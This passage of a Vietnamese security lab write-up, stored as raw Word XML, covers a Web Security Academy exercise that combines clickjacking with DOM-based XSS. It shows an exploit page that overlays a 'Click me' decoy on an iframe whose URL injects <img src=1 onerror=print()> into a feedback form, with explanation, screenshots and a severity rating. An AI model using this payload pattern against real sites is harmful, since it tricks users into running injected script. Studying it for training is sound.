        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>div</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB5E882" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00AA1EC7" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>absolute</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA5A515" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00AA1EC7" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>top</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B5CEA8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>420px</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BAF903" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00AA1EC7" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>left</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B5CEA8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>60px</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEFAE99" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00AA1EC7" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>z-index</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B5CEA8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0909FA81" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00AA1EC7" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDBCEF3" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00AA1EC7" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>style</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319F20F0" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00AA1EC7" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>div</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Click me</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>div</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BF56CD" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00AA1EC7" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"https://0a440051049fe814828ac0b3004b0062.web-security-academy.net/feedback?name=&lt;img src=1 onerror=print()&gt;&amp;email=hacker@attacker-website.com&amp;subject=test&amp;message=test#feedbackResult"</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0771D87C" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00AA1EC7" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2"/>
    <w:p w14:paraId="358AB0A4" w14:textId="32E7E5D4" w:rsidR="00F67FB2" w:rsidRPr="004F7CAE" w:rsidRDefault="00F67FB2" w:rsidP="004F7CAE">
      <w:r w:rsidRPr="004F7CAE">
        <w:t xml:space="preserve">Đoạn code này sử dụng kỹ thuật clickjacking để lừa người dùng nhấp vào một phần của trang web mà họ không mong muốn. Khi người dùng nhấp vào phần </w:t>
      </w:r>
      <w:r w:rsidR="00F656A4" w:rsidRPr="004F7CAE">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7CAE">
        <w:t>Click me</w:t>
      </w:r>
      <w:r w:rsidR="00F656A4" w:rsidRPr="004F7CAE">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7CAE">
        <w:t xml:space="preserve">, họ thực tế đang nhấp vào một iframe được ẩn bằng opacity, với nội dung từ một URL cụ thể. Trong URL, có một thẻ &lt;img&gt; với đường dẫn không hợp lệ (1), sử dụng lỗ hổng XSS để chạy hàm print(). Điều này có thể dẫn đến việc thực hiện các hành động độc hại trên trang web mục tiêu khi người dùng nhấp vào </w:t>
      </w:r>
      <w:r w:rsidR="004F7CAE" w:rsidRPr="004F7CAE">
        <w:t>“Click me”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A741C5" w14:textId="07454E43" w:rsidR="00F67FB2" w:rsidRPr="00AA1EC7" w:rsidRDefault="004F7CAE" w:rsidP="00F67FB2">
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00AA1EC7">
        <w:t xml:space="preserve">họn: </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08368E4B" wp14:editId="2FFD92B6">
            <wp:extent cx="1171739" cy="390580"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="244740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40574" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId258"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1171739" cy="390580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00AA1EC7">
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DF22430" wp14:editId="3D6317A2">
            <wp:extent cx="1190791" cy="371527"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1450806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06488" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId259"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1190791" cy="371527"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00AA1EC7">
        <w:t xml:space="preserve"> và xem kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F92F344" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="001E7D54">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D8E85A9" wp14:editId="7FAA55C5">
            <wp:extent cx="6115050" cy="3585210"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1810232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32371" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId260"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3585210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="038B433C" w14:textId="44847256" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00AA1EC7">
        <w:t xml:space="preserve">Sau khi nhấn vào </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7CAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Click me</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:t>, nhận thấy</w:t>
      </w:r>
      <w:r w:rsidR="004F7CAE">
        <w:t xml:space="preserve"> rằng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109F0BDF" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44A95B4E" wp14:editId="3020992D">
            <wp:extent cx="6115050" cy="2735580"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1885038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38648" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId261"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2735580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="763CA8C2" w14:textId="1E47B484" w:rsidR="00BB4C3E" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00AA1EC7">
        <w:t>Đến đây</w:t>
      </w:r>
      <w:r w:rsidR="004F7CAE">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:t xml:space="preserve">chọn </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DA12504" wp14:editId="5A160A34">
            <wp:extent cx="2010056" cy="438211"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="886071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71309" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId262"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2010056" cy="438211"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00AA1EC7">
        <w:t xml:space="preserve"> để gởi đoạn code khai thác đó tới nạn nhân và hoàn thành thử thách của bài lab này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409730E5" w14:textId="76ECD1E1" w:rsidR="00F67FB2" w:rsidRPr="002351AD" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00AA1EC7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A92618E" wp14:editId="7CB5574E">
            <wp:extent cx="6115050" cy="2769235"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1527286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86873" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId263"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2769235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="033B9497" w14:textId="7D62099A" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="002351AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7CAE">
        <w:t>High (Cao)</w:t>
      </w:r>
      <w:r w:rsidR="004F7CAE" w:rsidRPr="004F7CAE">
        <w:t xml:space="preserve"> v</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7CAE">
        <w:t>ì lỗ hổng này cho phép kẻ tấn công thực hiện các cuộc tấn công XSS dựa trên DOM, tiềm ẩn nguy cơ lớn đối với tính toàn vẹn và bảo mật của hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC01EB4" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="002351AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r w:rsidRPr="002351AD">
